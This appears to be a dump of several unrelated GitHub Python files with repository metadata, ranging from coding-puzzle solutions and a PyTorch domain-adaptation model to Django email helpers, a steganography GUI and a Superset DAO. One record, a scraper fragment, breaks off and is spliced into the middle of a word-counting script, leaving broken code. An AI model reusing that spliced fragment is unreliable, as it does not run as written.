%% Test RandomAgent\nprint(\"\\nTest RandomAgent...\")\nragent = buildRandomAgent()\nprint(f\"random agent = {ragent}\")\nragent.propagate(ragent.time + 10)\nprint(f\"propagated state = {ragent.eci_state}\")\n\nragent = buildRandomAgent(dynamics_model=\"terrestrial\")\nprint(f\"random agent = {ragent}\")\nragent.propagate(ragent.time + 10)\nprint(f\"propagated state = {ragent.eci_state}\")\n# %%\nplt.show()\nprint(\"done\")\n","repo_name":"dylan906/clockpunch","sub_path":"tests/common/test_agents.py","file_name":"test_agents.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23639070671","text":"#!/usr/bin/env python\nimport sys\n\nif __name__ == '__main__':\n    T = int(sys.stdin.readline()) \n\n    for i in range(T):\n        line = sys.stdin.readline()\n        line = line.replace(\"\\n\", \"\")  # bug fix: str.replace returns a new string, result was discarded\n        \n        numbers = list(map(int, line.split()))\n\n        N = numbers[0]\n        S = numbers[1]\n        p = numbers[2]\n\n        threshold_normal_score = 2*max((p-1), 0) + p\n        threshold_surprising_score = 2 * max((p-2), 0) + p\n        \n        count = 0\n        surprising_count = 0\n\n        for j in range(N):\n            score_sum = numbers[3+j]\n\n            if score_sum >= threshold_normal_score:\n                count += 1\n            elif (score_sum >= threshold_surprising_score) and (surprising_count < S):\n                count += 1 \n                surprising_count += 1\n            \n\n        print (\"Case #{0}: {1}\".format(i+1, count))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_96/1660.py","file_name":"1660.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27087760841","text":"import bisect\nfrom typing import List\n\n\nclass Solution:\n    def rectangleArea(self, rectangles: List[List[int]]) -> int:\n        events = []\n        for x1, y1, x2, y2 in rectangles:\n            
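# sweep line over y: +1 opens the rectangle's x-interval at y1, -1 closes it at y2\n            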
events.append((y1, 1, x1, x2))\n events.append((y2, -1, x1, x2))\n events.sort()\n\n def cal_x_len():\n l_x, lastx = 0, 0\n for x1, x2 in active:\n lastx = max(lastx, x1)\n l_x += max(0, x2 -lastx)\n lastx = max(lastx, x2)\n return l_x\n active = []\n lasty = events[0][0]\n rslt = 0\n for y, status, x1, x2 in events:\n rslt += cal_x_len()*(y-lasty)\n if status == 1:\n bisect.insort(active, (x1, x2))\n else:\n active.remove((x1, x2))\n lasty = y\n return rslt % (10**9 + 7)\n","repo_name":"Mela2014/lc_punch","sub_path":"lc850_array.py","file_name":"lc850_array.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30361579670","text":"import torch\nimport torch.nn as nn\nfrom torch import Tensor\n\nfrom torch import optim\n\nfrom networks.base_network import Generator, Discriminator, Classifier, Rx\n\n\nimport numpy as np\n\n\nfrom tqdm import tqdm\n\n\n\nclass MSTN(nn.Module):\n \"\"\"docstring for MSTN algo\"\"\"\n def __init__(self, args, gen= None, dis = None, clf = None):\n super(MSTN, self).__init__()\n \n self.gen = gen\n self.dis = dis\n self.clf = clf\n\n if self.gen == None :\n self.gen = Generator(args)\n if self.dis == None :\n self.dis = Discriminator(args)\n if self.clf == None :\n self.clf = Classifier(args)\n\n self.rx = Rx()\n \n self.n_features = args.n_features\n self.n_class = args.n_class\n self.s_center = torch.zeros((args.n_class, args.n_features), requires_grad = False, device=args.device)\n self.t_center = torch.zeros((args.n_class, args.n_features), requires_grad = False, device=args.device)\n self.disc = args.center_interita\n\n #def train_model(self, train = True):\n # self.dtrain = train\n\n def forward(self, x):\n features = self.gen(x)\n C_out = self.clf(features)\n D_out = self.dis(self.rx(features))\n return C_out, features, D_out\n\n\n\n\ndef update_centers(model, s_gen, t_gen, s_true, t_clf, args):\n source = torch.argmax(s_true, 1).reshape(t_clf.size(0),1).detach()# one Hot \n target = torch.argmax(t_clf, 1).reshape(t_clf.size(0),1).detach()\n\n s_center = torch.zeros(model.n_class, model.n_features, device=args.device)\n t_center = torch.zeros(model.n_class, model.n_features, device=args.device)\n\n s_zeros = torch.zeros(source.size()[1:], device=args.device)\n t_zeros = torch.zeros(target.size()[1:], device=args.device)\n\n for i in range(model.n_class):\n s_cur = torch.where(source.eq(i), s_gen, s_zeros).mean(0)\n t_cur = torch.where(target.eq(i), t_gen, t_zeros).mean(0)\n s_center[i] = s_cur * (1 - model.disc) + model.s_center[i] * model.disc\n t_center[i] = t_cur * (1 - model.disc) + model.t_center[i] * model.disc\n\n \n return s_center, t_center\n #return s_class, t_class\n\nadversarial_loss = torch.nn.BCELoss()\nclassification_loss = torch.nn.CrossEntropyLoss()\ncenter_loss = torch.nn.MSELoss(reduction='sum')\n\ndef eval_batch(model, sx, tx, s_true, t_true, opt,train, args):\n if train:\n opt.zero_grad()\n\n s_clf, s_gen, s_dis = model(sx)\n t_clf, t_gen, t_dis = model(tx)\n\n #helpers\n source_tag = torch.ones((sx.size(0), 1), device = args.device)\n target_tag = torch.zeros((tx.size(0), 1), device = args.device)\n s_true_hot = one_hot(s_true, model.n_class)\n #classification loss\n\n C_loss = classification_loss(s_clf, s_true.to(args.device))\n\n #generator loss\n s_G_loss = adversarial_loss(s_dis, source_tag)#0\n t_G_loss = adversarial_loss(t_dis, target_tag )#1\n G_loss = (s_G_loss + t_G_loss)\n\n \n #center loss more tricky\n s_c, t_c = 
update_centers(model, s_gen, t_gen, s_true_hot, t_clf, args)\n \n\n S_loss = center_loss(t_c, s_c)\n model.s_center = s_c.detach()\n model.t_center = t_c.detach()\n \n loss = C_loss + S_loss * args.lam + G_loss * args.lam\n if train: \n loss.backward()\n opt.step()\n\n\n s_acc = accuracy(s_clf, s_true.to(args.device))\n if t_true is not None :\n t_acc = accuracy(t_clf, t_true)\n else :\n t_acc= torch.tensor(0)\n return np.array([ S_loss.item(), C_loss.item(), G_loss.item(), s_acc.item(), t_acc.item()])\n \n\n\ndef run_epoch(model,opt, dataset, train, args):\n loss = np.zeros(5)\n device = args.device\n if train:\n model.train()\n else :\n model.eval()\n\n for sx, sy, tx, ty in tqdm(dataset):\n loss += eval_batch(model, sx.to(device), tx.to(device), sy, ty.to(device),opt, train, args)/len(dataset)\n if True: #todo args.verbose\n print(\"sem : {:6.4f},\\t clf {:6.4f},\\t Gen {:6.4f},\\t s_acc : {:6.4f},\\t acc : {:6.4f}\".format(*loss))\n return loss\n \ndef fit(args, epochs, model, opt, trainset, validset):\n out = list()\n\n for epoch in range(epochs):\n \n args.lam = adaptation_factor(epoch*1.0/epochs)\n \n train_loss = run_epoch(model,opt, trainset, train = True, args= args)\n valid_loss = run_epoch(model,None, validset, train = False, args = args)\n \n out.append((train_loss, valid_loss)) \n \n if args.save_step:\n file = open(args.save+\"_loss\", \"wb\")\n torch.save(model.state_dict(), args.save+'step')\n np.save(file,out)\n return out\n\n#utils\n\ndef adaptation_factor(qq):\n return 2/(1+np.exp(- 10 * qq )) - 1\ndef one_hot(batch,classes):\n ones = torch.eye(classes)\n return ones.index_select(0,batch)\n\n\ndef accuracy(pred, true):\n pred = pred.argmax(1)\n #print(pred, true)\n return (pred == true).float().mean()\n\n#not functional\ndef metric(pred,true, loss, args):#greedy\n n_class = args.n_class\n true = true.reshape(pred.size(0),1).to(device = args.device)\n zeros = torch.zeros((pred.size(0), 1), device = args.device)\n i_class = torch.zeros(n_class, device = args.device).long()\n cur_pred= pred\n for i in range(n_class):\n sum_class = torch.where(true.eq(i), cur_pred, zeros).sum(0)\n i_class[i] = torch.argmax(sum_class)\n true2 = one_hot(torch.tensor([i_class[i] for i in true]),n_class).to(device=args.device)\n return loss(pred, true2)\n","repo_name":"sally20921/MSTN","sub_path":"networks/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5480,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"26436848211","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 10 19:09:06 2020\n\n@author: AsteriskAmpersand\n\"\"\"\nfrom Cstruct import PyCStruct\nfrom collections import OrderedDict\nfrom Chunk import chunkPath\nfrom pathlib import Path\nfrom FileLike import FileLike\n\nclass Header(PyCStruct):\n fields = OrderedDict([\n (\"IB\" , \"byte[4]\"),\n (\"unkn0\" , \"int32\"),\n (\"cnt\" , \"int32\"),])\n\nclass Clagger(PyCStruct):\n fields = OrderedDict([\n (\"unkn0\" , \"int32\"),\n (\"normal\" , \"float\"),\n (\"enrage\" , \"float\"),\n (\"fatigue\" , \"float\"),\n (\"hpRangeMod\" ,\"float[10]\"),\n (\"lowr\" , \"float\"),\n (\"highr\" , \"float\"),\n (\"masterr\" , \"float\"),])\n def __repr__(self):\n return ','.join([str(getattr(self,f)) for f in self.fields if \"unkn\" not in f])\n def header(self):\n return ','.join([f for f in self.fields.keys() if \"unkn\" not in f])\nclass Trail(PyCStruct):\n fields = OrderedDict([\n (\"unkn\" , \"int32[3]\")])\n\nclass ClaggerCommon():\n defaultPath = 
Path(chunkPath).joinpath(r\"common\\em\\em_clawgrab_common.dtt_clawc\")\n def __init__(self):\n self.Header = Header()\n self.ClaggerTables = []\n def marshall(self,data):\n self.Header.marshall(data)\n self.ClaggerTables = [Clagger().marshall(data) for i in range(self.Header.cnt)]\n self.Trail = Trail().marshall(data)\n @staticmethod\n def open(filepath = None):\n if filepath is None:\n filepath=ClaggerCommon.defaultPath\n clag = ClaggerCommon()\n with open(filepath,\"rb\") as inf:\n clag.marshall(FileLike(inf.read()))\n return clag\n def __getitem__(self,ix):\n return self.ClaggerTables[ix]","repo_name":"AsteriskAmpersand/QuestDataDump","sub_path":"clagger.py","file_name":"clagger.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"42644802934","text":"import sys\nimport h5py\nfrom glob import glob\n\n\ndef info(path):\n with h5py.File(path, \"r\") as f:\n first = (\"version\", \"model\")\n for k in first:\n print(\"{} = {}\".format(k, f[\"metadata\"][k][...]))\n for k, v in f[\"metadata\"].items():\n if k not in first:\n print(\"{} = {}\".format(k, v[...]))\n for k in (\"N\", \"L\", \"dt\", \"n_matmul\", \"n_delay\", \"n_sweep_warm\",\n \"n_sweep_meas\", \"period_eqlt\", \"period_uneqlt\"):\n print(\"{} = {}\".format(k, f[\"params\"][k][...]))\n\n\ndef main(argv):\n #rework this function to make sure it works on Windows\n for path_spec in argv[1:]:\n files = sorted(glob(path_spec))\n if len(files) == 0:\n print(\"No files matching:\"+path_spec)\n else:\n for f in files:\n print(f)\n info(f)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"edwnh/dqmc","sub_path":"util/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"5212398453","text":"from email.mime.image import MIMEImage\nimport random, string\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nimport gspread\nfrom django.conf import settings\n\n\ndef random_string_generator(length):\n uppercase_string = string.ascii_uppercase\n lowercase_string = string.ascii_lowercase\n digit_string = string.digits\n\n return ''.join(random.choices(uppercase_string + lowercase_string + digit_string, k=length))\n\ndef send_email(template,subject,to_emails,merge_data,connection=None,from_email=None,bcc=None):\n html_content = render_to_string(template, merge_data)\n message = EmailMultiAlternatives(\n subject= subject,\n from_email=from_email, \n to = to_emails,\n connection=connection,\n bcc=bcc,\n )\n message.attach_alternative(html_content,'text/html')\n message.send(fail_silently=False)\n\ndef send_email_img(template,subject,to_emails,merge_data,img,connection=None,from_email=None,bcc=None):\n html_content = render_to_string(template, merge_data)\n message = EmailMultiAlternatives(\n subject= subject, \n from_email=from_email,\n to = to_emails,\n connection=connection,\n bcc=bcc,\n )\n if img:\n mime_image = MIMEImage(img)\n mime_image.add_header('Content-ID', '')\n message.attach(mime_image)\n message.attach_alternative(html_content,'text/html')\n message.send(fail_silently=False)\n\n# Google API\n# scope = [\n# 'https://www.googleapis.com/auth/drive',\n# 'https://www.googleapis.com/auth/drive.file'\n# ]\n# def add_participant_to_google_sheet(user_info): \n# # Connect to google service account \n# gc = 
gspread.service_account_from_dict(settings.GOOGLE_JSON_KEY,scopes=scope)\n# # Get Spreadsheet\n# sheet = gc.open_by_key(settings.SPREADSHEET_ID)\n# participant_worksheet = sheet.worksheet('Participant')\n# #get last row\n# last_row = len(participant_worksheet.get_all_values())\n# #get field name\n# field_list = participant_worksheet.row_values(1)\n# col = 1\n# # Check if participant exist in spread, update exist participant and return\n# qr_exist = participant_worksheet.find(in_column=6,query=user_info.get('QRCode'))\n# if qr_exist is not None:\n# for field in field_list: \n# participant_worksheet.update_cell(qr_exist.row,col,str(user_info.get(field)))\n# col +=1\n# return\n# # Add new Participant to google sheet\n# for field in field_list: \n# participant_worksheet.update_cell(last_row + 1,col,str(user_info.get(field)))\n# col +=1\n\ndef get_client_ip(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n return ip","repo_name":"minhhien98/TicketApp","sub_path":"users/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8101089917","text":"from datetime import datetime, timedelta\nimport os\n\nimport pandas as pd\n\ndef get_month_start(date: datetime=datetime.today()):\n month_start = (date - timedelta(days=date.day)).replace(day=1).date()\n return month_start\n\ndef get_month_end(date: datetime=datetime.today()):\n month_end = (date - timedelta(days=date.day)).date()\n return month_end\n\n\nclass Report:\n def __init__(self, report_directory:str, start_date: datetime=get_month_start(), end_date: datetime=get_month_end()):\n self.report_directory = report_directory\n self.start_date = start_date\n self.end_date = end_date\n\n def merge_reports(self, left_df: pd.DataFrame, right_df: pd.DataFrame, merge_column:str) -> pd.DataFrame:\n print('INFO: Merging reports')\n dataframe = pd.merge(left_df, right_df, how='left', on=merge_column)\n dataframe = dataframe.fillna(0)\n return dataframe\n\nclass EventsReport(Report):\n def __init__(self, report_directory, start_date: datetime=get_month_start(), end_date: datetime=get_month_end()):\n super().__init__(report_directory, start_date, end_date) \n print('EVENT INFO: Reading Individual Reports')\n try:\n self.read_all_reports()\n except TypeError as e:\n print(e)\n print('EVENT INFO: Combining Reports')\n self.base_report = self.combine_all_dataframes()\n print('EVENT INFO: Creating Final Events Report')\n self.final_report = self.create_final_report()\n\n\n def read_csv_to_dataframe(self, file_name: str, report_type: str) -> pd.DataFrame:\n \"\"\"Returns dataframe from CSV\n\n Args:\n file_name (str): Location of the file\n report_type (str): Name of the camera events that are being tracked in CSV. 
Lytx reports don't name CSVs appropriately.\n\n        Returns:\n            pd.DataFrame: Basic Dataframe with updated column names\n        \"\"\"\n        dataframe = pd.read_csv(file_name)\n        dataframe = dataframe.drop(columns=['Total Score_Total', 'Total Score_Trend', 'Total Events_Trend', 'Recent Notes'])\n        dataframe = dataframe.rename(columns={'Total Events_Total': report_type})\n        dataframe = dataframe.fillna(0)\n        return dataframe\n\n    def read_all_reports(self) -> None:\n        \"\"\"\n        Loops through files in the report directory, reads each CSV, and adds it to the list of dataframes.\n        Invalid file types are skipped with a warning instead of aborting the scan.\n        \"\"\"\n        self.all_reports = []\n        for root, dirs, files in os.walk(self.report_directory):\n            for file in files:\n                if file == 'accidents_report.csv':\n                    print('EVENT INFO: Skipped Accident Report')\n                    continue\n                if file.endswith('.csv'):\n                    report_type = file.replace('.csv', '').upper()\n                    self.all_reports.append(self.read_csv_to_dataframe(f'{root}{file}', report_type))\n                else:\n                    # bug fix: raising here aborted the whole scan; the message and docstring say the file should be skipped\n                    print(f'EVENTS ERROR: {file} is an invalid file type. Skipping this file.')\n\n    def combine_all_dataframes(self) -> pd.DataFrame:\n        \"\"\"\n        Combines all dataframes read by read_all_reports. Fills all empty cells with 0. \n\n        Returns:\n            pd.DataFrame: Combined dataframe.\n        \"\"\"\n        dataframe = pd.concat(self.all_reports)\n        dataframe = dataframe.fillna(0)\n        return dataframe\n\n    def create_final_report(self) -> pd.DataFrame:\n        \"\"\"Reformats base_report into a cleaner and more refined Report for final use.\n\n        Returns:\n            pd.DataFrame: Formatted Dataframe\n        \"\"\"\n        drivers = self.base_report.groupby('Employee ID')\n        rows = []\n        for i, driver in drivers:\n            driver_id = i\n            driver_fleet = driver['Group'].unique()[0]\n            start_date = self.start_date\n            end_date = self.end_date\n            driver_row = {\n                'DRIVER': driver_id,\n                'FLEET': driver_fleet,\n                'START DATE': start_date,\n                'END DATE': end_date,\n                'HANDHELD DEVICE': driver['HANDHELD'].sum(),\n                'INATTENTIVE': driver['INATTENTIVE'].sum(),\n                'FOLLOWING DISTANCE': driver['FOLLOWING_DISTANCE'].sum(),\n                'LANE DEPARTURE': driver['LANE_DEPARTURE'].sum(),\n                'ROLLING STOP': driver['ROLLING_STOP'].sum(),\n                'CRITICAL DISTANCE': driver['CRITICAL_DISTANCE'].sum(),\n            }\n            rows.append(driver_row)\n        return pd.DataFrame(rows)\n\n    def final_report_to_csv(self, save_path: str=None):\n        \"\"\"Creates CSV of final report. If save_path is provided the file will be saved there. If not it will be saved in current directory.\n        Args:\n            save_path (str, optional): Location you would like to save the new CSV to. 
Defaults to None.\n \"\"\"\n file_name = f'lytx_report_{self.start_date}.csv'\n print(f'<-- Saving Report to {os.getcwd()}\\lytx_report_{self.start_date}.csv -->')\n if save_path:\n self.final_report.to_csv(f'{save_path}{file_name}', index=False, header=False)\n else:\n self.final_report.to_csv(file_name, index=False, header=False)\n\nclass AccidentReport(Report):\n def __init__(self, report_directory, accidents_csv:str='accidents_report.csv', start_date: datetime=get_month_start(), end_date: datetime=get_month_end()):\n super().__init__(report_directory, start_date, end_date) \n self.accidents_csv = accidents_csv\n print('ACCIDENT INFO: Verifying Accident Report Exists')\n try:\n self.find_file()\n except FileNotFoundError as e:\n print(e)\n print('ACCIDENT INFO: Creating base Accidents Report')\n self.base_accidents_csv = self.read_file_to_dataframe()\n print('ACCIDENT INFO: Creating Final Accidents Report')\n self.final_report = self.create_final_report()\n\n def find_file(self):\n if os.path.isfile(f'{self.report_directory}{self.accidents_csv}'):\n print('ACCIDENT INFO: Accident File Found')\n return\n else:\n raise FileNotFoundError(f'ACCIDENT ERROR: {self.accidents_csv} not found in reports directory')\n\n def read_file_to_dataframe(self) -> pd.DataFrame:\n dataframe = pd.read_csv(f'{self.report_directory}{self.accidents_csv}')\n dataframe = dataframe[['Driver', 'Accident date', 'Preventable']]\n dataframe = dataframe.rename(columns={'Driver': 'DRIVER'})\n dataframe['Accident date'] = pd.to_datetime(dataframe['Accident date']).dt.date\n dataframe['Preventable'] = dataframe['Preventable'].replace({'Yes': True, 'No': False})\n\n return dataframe\n \n def create_final_report(self):\n total_preventable_accidents = self.base_accidents_csv.loc[self.base_accidents_csv['Preventable'] == True]\n driver_dataframes = []\n drivers = total_preventable_accidents.groupby('DRIVER')\n for driver_code, driver in drivers:\n month_accidents = driver.loc[(driver['Accident date'] < self.end_date) & (driver['Accident date'] > self.start_date)]\n driver_dataframes.append(\n {\n 'DRIVER': driver_code,\n 'ACCIDENTS THIS MONTH': len(month_accidents),\n 'TOTAL ACCIDENTS': len(driver)\n })\n dataframe = pd.DataFrame(driver_dataframes)\n return dataframe\n\nreport = EventsReport(f'{os.getcwd()}/reports/')\naccident_report = AccidentReport(f'{os.getcwd()}/reports/')","repo_name":"randybowers21/lytx_report_reader","sub_path":"lytx_report_reader/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27960434560","text":"from Embedding import Embedding\nfrom Extracting import Extracting\nfrom tkinter import filedialog\nfrom tkinter import Button\nfrom tkinter import Label\nfrom tkinter import Menu\nfrom tkinter import NORMAL\nfrom analysis import Analysis\n\n\nclass Window:\n \n def __init__(self,root):\n \n self.check = 1\n self.carrier_file = ''\n self.text_file = ''\n self.dirty_file = ''\n self.extracted_file = \"extracted_file.txt\"\n \n self.root = root\n self.root.title(\"LSB Algorithm\")\n self.root.geometry('600x300')\n \n # Menu\n self.menubar = Menu(self.root)\n\n embedding_menu = Menu(self.menubar, tearoff=0)\n self.menubar.add_cascade(label=\"Embedding\", menu=embedding_menu)\n embedding_menu.add_command(label=\"Choose text file\", command=self.text_open)\n embedding_menu.add_command(label=\"Choose carrier file\", command=self.carrier_open)\n \n extract_menu = Menu(self.menubar, 
tearoff=0)\n extract_menu.add_command(label=\"Choose dirty file\", command=self.dirty_open)\n self.menubar.add_cascade(label=\"Extracting\", menu=extract_menu)\n \n analysis_menu = Menu(self.menubar, tearoff=0)\n analysis_menu.add_command(label=\"PSNR\", command=self.PSNR)\n analysis_menu.add_command(label=\"SSIM\", command=self.SSIM)\n self.menubar.add_cascade(label=\"Analysis\", menu=analysis_menu, state = \"disabled\")\n \n self.menubar.add_command(label=\"exit\", command=self.quit)\n self.root.config(menu=self.menubar)\n \n # Buttons\n self.embed_button = Button(self.root, text=\"Embedding\", command = self.embed_function, state='disabled')\n self.extract_button = Button(self.root, text=\"Extracting\", command = self.extract_function, state='disabled')\n \n # Labels\n self.text_label= Label(self.root, text = '')\n self.carrier_label = Label(self.root, text = '')\n self.dirty_label = Label(self.root, text = '')\n self.algo_label = Label(self.root, text = 'No Algorithm done')\n self.PSNR_label = Label(self.root,text = '')\n self.SSIM_label = Label(self.root, text = '')\n \n # Placement\n self.embed_button.grid(column=1, row=0)\n self.extract_button.grid(column=1, row=2)\n self.text_label.grid(column=2, row=0)\n self.carrier_label.grid(column=2, row=1)\n self.dirty_label.grid(column=2, row=2)\n self.algo_label.grid(column=2, row=3)\n self.PSNR_label.grid(column=2, row=4)\n self.SSIM_label.grid(column=2, row=5)\n # Open files\n def carrier_open(self):\n self.carrier_file = filedialog.askopenfilename(initialdir = \"./\",title = \"Select carrier file\",filetypes = [(\"bmp files\",\"*.bmp\")])\n if (len(self.text_file) > 0):\n self.embed_button.config(state=NORMAL)\n self.carrier_label['text'] = self.carrier_file \n \n \n def text_open(self):\n self.text_file = filedialog.askopenfilename(initialdir = \"./\",title = \"Select text file\",filetypes = [(\"text files\",\"*.txt\")])\n if (len(self.carrier_file) > 0):\n self.embed_button.config(state=NORMAL)\n self.text_label['text'] = self.text_file \n \n \n def dirty_open(self):\n self.dirty_file = filedialog.askopenfilename(initialdir = \"./\",title = \"Select dirty file\",filetypes = [(\"bmp files\",\"*.bmp\")])\n if (len(self.dirty_file) > 0):\n self.extract_button.config(state=NORMAL)\n self.dirty_label['text'] = self.dirty_file \n \n # Exit\n def quit(self):\n self.check = 0\n self.root.quit\n \n # Stego functions\n def embed_function(self):\n self.dirty_file = \"LSBFile.bmp\"\n embed = Embedding(self.text_file, self.carrier_file, self.dirty_file)\n embed.embedding_process()\n self.extract_button.config(state=NORMAL)\n self.algo_label['text'] = \"Embedding done!\"\n self.dirty_label['text'] = self.dirty_file\n self.menubar.entryconfig(\"Analysis\", state=\"normal\")\n self.analysis = Analysis(self.carrier_file,self.dirty_file)\n \n def extract_function(self):\n extract = Extracting(self.dirty_file ,self.extracted_file)\n extract.extracting_process()\n self.algo_label['text'] = \"Extracting done!\" \n \n # Analysis\n def PSNR(self):\n psnr = self.analysis.calculate_psnr()\n self.PSNR_label['text'] = \"PSNR: \" + str(psnr)\n \n def SSIM(self):\n ssim = self.analysis.calculate_ssim()\n self.SSIM_label['text'] = \"SSIM: \" + str(ssim) \n \n\n\n \n","repo_name":"Phoetaim/Steganography","sub_path":"Assign05/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":4651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3209298082","text":"\nfrom sortedcontainers import 
SortedList\n\n\nclass MKAverage:\n\n def __init__(self, m: int, k: int):\n self.nums = SortedList()\n self.m = m\n self.k = k\n\n def addElement(self, num: int) -> None:\n if len(self.nums) == self.m and num > self.nums[0]:\n self.nums.pop(0)\n self.nums.add(num)\n\n def calculateMKAverage(self) -> int:\n if len(self.nums) < self.m:\n return -1\n cur = self.nums[self.k: -self.k]\n return sum(cur) // len(cur)\n\n\nif __name__ == '__main__':\n mk = MKAverage(m=3, k=1)\n mk.addElement(3)\n mk.addElement(1)\n print(mk.calculateMKAverage())\n mk.addElement(10)\n print(mk.calculateMKAverage())\n mk.addElement(5)\n mk.addElement(5)\n mk.addElement(5)\n print(mk.calculateMKAverage())\n","repo_name":"foreverxujiahuan/algorithm","sub_path":"队列/lc1825.py","file_name":"lc1825.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"529399033","text":"from util.TableParse import parse,clean as limpia\nfrom common.constants import COLLECTOR_ROOT\nfrom lib.download_files import doDownload\nimport urlparse\nfrom random import randint\ntabla =[]\nimport os\nimport logging\n\n# prevInputWordsLength:\n inputWordsOrder[word] = len(inputWords)\n for word in inputWords:\n print(word, inputWordsOrder[word])\nprint(\"Finished\")\n ","repo_name":"MTset/Python-Programming-Coursework","sub_path":"Python 01: Beginning Python/Lesson 06: Sets and Dicts/input_counter.py","file_name":"input_counter.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12360492414","text":"import sys\n\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\nfrom PyQt5.QtGui import QIcon\nfrom view.login import Ui_Login_form\nfrom view.main import Ui_MainWindow\n\n\nclass MainForm(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.main_form = Ui_MainWindow()\n self.main_form.setupUi(self)\n self.setWindowIcon(QIcon('icons/page/home-page.png'))\n\n\nclass LoginForm(QMainWindow, Ui_Login_form):\n def __init__(self):\n super().__init__()\n self.login = Ui_Login_form()\n self.login.setupUi(self)\n self.setupFormUI()\n\n\n def setupFormUI(self):\n self.setWindowTitle('Login form')\n self.setWindowIcon( QIcon('icons/page/login-rounded-right.png') )\n self.login.lineEdit_login.setPlaceholderText('Enter login')\n self.login.lineEdit_password.setPlaceholderText('Enter password')\n self.login.btn_confirm.setFocus()\n self.login.btn_confirm.clicked.connect(self.confirm_pushed)\n\n\n def confirm_pushed(self):\n self.login.lbl_error.setText('Error. 
Wrong data')\n #login_window.close()\n self.main_window = MainForm()\n self.main_window.show()\n self.main_window.main_form.tabWidget.setTabEnabled(3,False)\n\n\n\napp = QApplication(sys.argv)\nlogin_window = LoginForm()\nlogin_window.show()\nsys.exit(app.exec_())","repo_name":"Yelesin/CourseWorkDatabase","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25166162095","text":"from __future__ import annotations\n\nimport logging\nfrom typing import Any\n\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom superset.connectors.sqla.models import SqlaTable, SqlMetric, TableColumn\nfrom superset.daos.base import BaseDAO\nfrom superset.extensions import db\nfrom superset.models.core import Database\nfrom superset.models.dashboard import Dashboard\nfrom superset.models.slice import Slice\nfrom superset.utils.core import DatasourceType\nfrom superset.views.base import DatasourceFilter\n\nlogger = logging.getLogger(__name__)\n\n\nclass DatasetDAO(BaseDAO[SqlaTable]):\n base_filter = DatasourceFilter\n\n @staticmethod\n def get_database_by_id(database_id: int) -> Database | None:\n try:\n return db.session.query(Database).filter_by(id=database_id).one_or_none()\n except SQLAlchemyError as ex: # pragma: no cover\n logger.error(\"Could not get database by id: %s\", str(ex), exc_info=True)\n return None\n\n @staticmethod\n def get_related_objects(database_id: int) -> dict[str, Any]:\n charts = (\n db.session.query(Slice)\n .filter(\n Slice.datasource_id == database_id,\n Slice.datasource_type == DatasourceType.TABLE,\n )\n .all()\n )\n chart_ids = [chart.id for chart in charts]\n\n dashboards = (\n (\n db.session.query(Dashboard)\n .join(Dashboard.slices)\n .filter(Slice.id.in_(chart_ids))\n )\n .distinct()\n .all()\n )\n return {\"charts\": charts, \"dashboards\": dashboards}\n\n @staticmethod\n def validate_table_exists(\n database: Database, table_name: str, schema: str | None\n ) -> bool:\n try:\n database.get_table(table_name, schema=schema)\n return True\n except SQLAlchemyError as ex: # pragma: no cover\n logger.warning(\"Got an error %s validating table: %s\", str(ex), table_name)\n return False\n\n @staticmethod\n def validate_uniqueness(\n database_id: int,\n schema: str | None,\n name: str,\n dataset_id: int | None = None,\n ) -> bool:\n dataset_query = db.session.query(SqlaTable).filter(\n SqlaTable.table_name == name,\n SqlaTable.schema == schema,\n SqlaTable.database_id == database_id,\n )\n\n if dataset_id:\n # make sure the dataset found is different from the target (if any)\n dataset_query = dataset_query.filter(SqlaTable.id != dataset_id)\n\n return not db.session.query(dataset_query.exists()).scalar()\n\n @staticmethod\n def validate_update_uniqueness(\n database_id: int,\n schema: str | None,\n dataset_id: int,\n name: str,\n ) -> bool:\n dataset_query = db.session.query(SqlaTable).filter(\n SqlaTable.table_name == name,\n SqlaTable.database_id == database_id,\n SqlaTable.schema == schema,\n SqlaTable.id != dataset_id,\n )\n return not db.session.query(dataset_query.exists()).scalar()\n\n @staticmethod\n def validate_columns_exist(dataset_id: int, columns_ids: list[int]) -> bool:\n dataset_query = (\n db.session.query(TableColumn.id).filter(\n TableColumn.table_id == dataset_id, 